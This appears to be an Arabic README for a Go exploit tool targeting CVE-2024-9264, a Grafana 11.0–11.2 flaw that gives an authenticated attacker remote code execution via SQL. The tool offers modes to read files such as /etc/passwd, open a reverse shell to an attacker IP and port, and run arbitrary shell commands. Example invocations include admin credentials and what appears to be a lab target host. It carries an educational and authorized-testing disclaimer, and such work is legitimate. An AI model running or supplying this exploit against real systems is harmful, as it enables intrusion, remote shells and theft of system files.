
تنفيذ بلغة Go لـ CVE-2024-9264 والذي يؤثر على إصدارات Grafana 11.0.x و11.1.x و11.2.x.
أداة استغلال لثغرة CVE-2024-9264، وهي ثغرة حرجة في Grafana تسمح للمهاجم المُصادَق بتنفيذ استعلام SQL يؤدي إلى RCE
🛡️ هذه الأداة مخصّصة لأغراض تعليمية واختبار الاختراق المصرّح به فقط.
الاستخدام غير المصرّح به غير قانوني وغير أخلاقي.
CVE-2024-9264 هي ثغرة حرجة في Grafana تسمح للمهاجم المُصادَق بتنفيذ أوامر SQL تؤدي إلى RCE وقراءة الملفات.
file – قراءة ملفات عشوائية (مثل: /etc/passwd)shell – قذيفة عكسية إلى جهاز المهاجمcommand – تنفيذ أوامر شل عشوائية (مثل: whoami)
ليست كل الوسائط ضرورية.
go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd
go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'
go run main.go [flags]